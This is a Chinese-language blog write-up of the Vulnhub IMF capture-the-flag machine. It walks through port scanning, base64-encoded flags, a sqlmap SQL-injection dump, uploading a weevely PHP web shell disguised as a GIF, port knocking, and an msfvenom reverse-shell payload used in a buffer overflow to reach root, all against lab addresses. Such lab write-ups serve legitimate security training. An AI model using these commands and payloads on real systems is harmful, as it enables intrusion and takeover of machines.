2021年1月9日-Vulnhub-IMF

2021年1月9日-Vulnhub-IMF

介绍

下载地址:https://www.vulnhub.com/entry/imf-1,162/

kali地址:192.168.31.77

靶机IP地址:192.168.31.233

步骤

image-20210109233020085

nmap 扫描端口

image-20210109233641734

访问web页面

image-20210109233809484

找了半天 发现了 第一个flag ,使用了base64加密

image-20210109234241225

使用base64解码

image-20210109235410814

image-20210109235641263

这三个文件是连在一起的,放在一起一起解密

image-20210109235939871

获得flag2

继续base64解密

image-20210110000241982

得到imfadministrator

访问目录

image-20210110000454814

contact.php有三个用户名,可以用这三个用户名尝试登录

image-20210110001656841

使用Burpsuite作为代理软件,截取信息

Burpsuite 教程https://www.bilibili.com/video/BV1T7411m7KG/

尝试使用admin /admin登录

image-20210110002018288

显示,无效的用户名

使用rmichaels作为用户名,密码使用空数组可以获得 flag3{Y29udGludWVUT2Ntcw==}

image-20210110002346776

并得到 cms.php?pagename=home

使用base64 对 flag3解密

image-20210110002505870

访问cms.php?pagename=home 页面

image-20210110002559340

image-20210110003041360

将 home替换为 *

保存到文件,然后对其进行sql注入攻击

sqlmap -r biusql --risk=3 --level=5 --dbs --dump --batch --threads=10

image-20210110003500360

image-20210110003534142

访问 /images/whiteboard.jpg

image-20210110003703296

扫描二维码得到 flag4{dXBsb2FKcjk0Mi5waHA=}

对其进行base64解密

image-20210110003846014

访问uploadr942.php, 可以上传文件

image-20210110004044103

使用weevely提权

首先利用weevely生成 php文件

image-20210110013215186

image-20210110013148998

上传文件

image-20210110013049719

将 biu.php 修改成gif文件

修改gif文件

image-20210110014025669

上传图片木马

文件上传成功

image-20210110014238792

返回值 7652164f4a67

利用 weevely链接木马

weevely  http://192.168.31.233/imfadministrator/uploads/7652164f4a67.gif jesse

image-20210110014604333

获得 flag5

image-20210110014722301

对其进行 base64解密

image-20210110014824011

解码 agentservices 代理服务

搜索文件

使用>/dev/null把错误信息重定向到黑洞中,只留下正确的信息回显,

image-20210110015315029

image-20210110015445555

查看 7788端口也有代理在执行

image-20210110015630203

在 /usr/local/bin 下发现端口序列:7482 8279 9467

image-20210110015739266

使用knock敲门

首先下载 git clone https://github.com/grongor/knock.git

image-20210110020239173

image-20210110020330005

敲开了7788端口

使用 file_agent 下载文件到本地

image-20210110154115599

image-20210110154223057

使用 file 产看 agent是 ELF32位文件

image-20210110154307432

image-20210110160603400

使用ltrace(跟踪进程调用库函数的情况)查看agent信息

image-20210110160708353

运行 agent 这次输入id值:48093572,ID正确

image-20210110160819720

要通过缓冲区溢出7788端口的agent程序,用二进制修改exp
为该程序创建一个利用程序。

我们为msfvenom有效负载创建一个shellcode

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.31.77 LPORT=6666 -f python -b "\x00\x0a\x0b"

image-20210110175918372

image-20210110175817234

监听6666 端口,获得靶机root权限

image-20210110175933562

进入 /root 路径下,获得flag6

image-20210110180124200

image-20210110180147468

总结

这个靶机使用的知识点 比较多,断断续续搞了两天才写完。

有些地方还没搞懂还需要慢慢消化。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值